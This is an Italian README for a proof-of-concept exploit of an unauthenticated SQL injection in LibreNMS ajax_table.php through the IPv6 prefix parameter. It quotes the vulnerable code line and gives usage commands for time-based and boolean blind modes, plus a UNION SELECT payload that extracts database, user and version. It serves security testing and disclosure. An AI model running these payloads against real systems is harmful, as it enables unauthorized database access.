
Proof-of-concept exploit per SQL injection non autenticata in LibreNMS ajax_table.php, che dimostra tecniche di blind injection basate sul tempo e su condizioni booleane per test di sicurezza autorizzati.
SQL Injection non autenticata in ajax_table.php di LibreNMS tramite il parametro di ricerca dell'indirizzo IPv6.
15429580baba03ed1dd377bada1bde4b7a1175a1)CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:NIl parametro address quando search_type=ipv6 viene suddiviso su / in indirizzo e prefisso.
Il prefisso viene concatenato direttamente in una query SQL senza escaping:
$sql .= " AND ipv6_prefixlen = '$prefix'";
Un apice singolo (') nella parte del prefisso consente di uscire dalla stringa letterale → SQL injection arbitraria.
flowchart TD
A[Attacker] -->|1. HTTP POST to /ajax_table.php| B[LibreNMS Web Server]
B -->|2. id=address-search & search_type=ipv6| C[Parse address parameter]
C -->|3. Split on '/' → $address / $prefix| D[Build vulnerable SQL]
D -->|4. Concatenate: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
E -->|5. Execute injected query| F[Return results / error / delay]
F -->|6. Attacker observes response / timing| A
subgraph "Injection Point"
D
end
style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff
requests (pip install requests)python3 exploit.py http://target/librenms --test
python3 exploit.py http://192.168.1.50/librenms --time
→ Se la risposta richiede >5–6 secondi → vulnerabile
python3 exploit.py http://target/librenms --boolean
python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
exploit.py .............. Script PoC principale (rinominare da cve-2026-26988-poc.py se necessario)README.md ............... Questo file15429580baba... → PR #18777Questo proof-of-concept è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.
NON utilizzare questo codice contro qualsiasi sistema o rete senza un'esplicita autorizzazione scritta del proprietario.
L'uso non autorizzato può violare leggi, incluse (ma non solo) il Computer Fraud and Abuse Act (CFAA) negli Stati Uniti o la legislazione equivalente nel tuo paese.
Usalo a tuo rischio.
Autore: Mohammed Idrees Banyamer
Instagram: @banyamer_security
Data: 20 febbraio 2026